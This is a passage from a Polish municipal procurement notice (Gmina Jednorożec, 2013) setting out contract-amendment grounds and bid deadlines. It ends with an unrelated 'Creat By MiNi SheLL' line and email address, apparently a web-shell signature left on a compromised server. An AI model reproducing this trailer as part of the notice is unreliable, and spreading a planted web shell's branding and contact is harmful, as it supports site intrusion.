2) Zmiany sposobu i zakresu wykonania robót w zakresie INWESTYCJI, w tym:
a)	zmianą przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych poszczególnych elementów inwestycji niż przewidzianych w dokumentacji projektowej,
b)	zaistnieniem istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
c)	wystąpieniem okoliczności, powodujących konieczność zrezygnowania przez Zamawiającego z części zakresu robót realizowanych przez wykonawcę robót w ramach inwestycji, tj. z powodu błędu w dokumentacji projektowej nie zachodzi konieczność ich wykonania. W takim przypadku wynagrodzenie Wykonawcy, 
o którym mowa w umowie zostanie pomniejszone przez zastosowanie procentu, o jaki zmniejszyła się wartość robót z kosztorysu ofertowego wykonawcy robót w stosunku do wartości zakresu robót wykonanych przez wykonawcę robót.
3)Wystąpienia innych okoliczności skutkujących koniecznością wprowadzenia zmian do umowy, w tym:
a) zmiany stawek podatku od towarów i usług,
b)	zmiany nazwy zadania,
c)	zmiany częstotliwości odbioru robót częściowych i częściowych rozliczeń,
d)	zmian podmiotowych po stronie Wykonawcy tzn. Inspektora nadzoru Inwestorskiego, zgodnie z obowiązującymi przepisami prawa,
e)	zmiany nr rachunku bankowego Wykonawcy, na który jest płacone wynagrodzenie,
f)	przerwania dofinansowania realizacji inwestycji z Unii Europejskiej w ramach RPO WM 2007 - 2013,
g)	koniecznością sprostowania oczywistych omyłek i błędów pisarskich,
h)	innych zmian dotyczących realizacji Projektu ilub koniecznych do prawidłowej realizacji niniejszej umowy.
2. Zmiany dokonane w przypadkach określonych w niniejszym paragrafie wymagają dochowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jednorozec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jednorożcu
ul. Odrodzenia 14, 06-323 Jednorożec
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2013 godzina 10:00, miejsce: Urząd Gminy w Jednorożcu
ul. Odrodzenia 14, 06-323 Jednorożec
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Mazowieckiego 2007-2013
Ministerstwo Sportu i Turystyki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com